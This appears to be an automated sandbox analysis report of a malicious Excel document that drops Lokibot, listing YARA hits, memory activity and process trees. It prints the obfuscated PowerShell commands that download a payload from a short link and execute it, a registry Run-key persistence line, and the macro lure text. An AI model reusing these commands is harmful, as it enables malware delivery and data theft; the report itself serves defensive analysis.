Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000006.00000003.2094858856.000000001D2AE000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly
Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/
Source: powershell.exe, 00000006.00000002.2098023844.00000000001D0000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2099196904.0000000002BD1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2099216608.0000000002BFF000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/qjdJoz4
Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/qjdJoz4PE
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0 Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
Source: Document image extraction number: 0 Screenshot OCR: Enable Content"
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1 Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
Source: Document image extraction number: 1 Screenshot OCR: Enable Content"
Found Excel 4.0 Macro with suspicious formulas
Source: 6Cprm97UTl.xls Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: 6Cprm97UTl.xls Initial sample: Sheet size: 5194
Found obfuscated Excel 4.0 Macro
Source: 6Cprm97UTl.xls Initial sample: High usage of CHAR() function: 16
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\12.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Local\Temp\12.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\12.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\ntrwe.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\ntrwe.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\ntrwe.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\ntrwe.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\ntrwe.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\ntrwe.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to launch a process as a different user
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D5BC0 CreateProcessAsUserW, 15_2_009D5BC0
Detected potential crypto function
Document contains embedded VBA macros
Source: 6Cprm97UTl.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RegAsm.exe 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: String function: 00405B6F appears 42 times
Searches the installation path of Mozilla Firefox
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Uses reg.exe to modify the Windows registry
Source: unknown Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Yara signature match
Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: ntrwe.exe.11.dr, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: ntrwe.exe.11.dr, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.0.12.exe.12a0000.0.unpack, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.0.12.exe.12a0000.0.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.12.exe.12a0000.3.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.12.exe.12a0000.3.unpack, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 15.0.ntrwe.exe.e90000.0.unpack, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.ntrwe.exe.e90000.4.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 15.2.ntrwe.exe.e90000.4.unpack, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.spyw.expl.evad.winXLS@27/18@2/3
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 17_2_0040650A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 17_2_0040434D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\B5DE0000
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCF6F.tmp
Source: 6Cprm97UTl.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........X.......N.......p...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\12.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\ntrwe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\ntrwe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\ntrwe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: unknown Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
Source: C:\Users\user\AppData\Local\Temp\12.exe Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Source: C:\Users\user\AppData\Local\Temp\12.exe Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Source: C:\Users\user\ntrwe.exe Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Users\user\ntrwe.exe Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
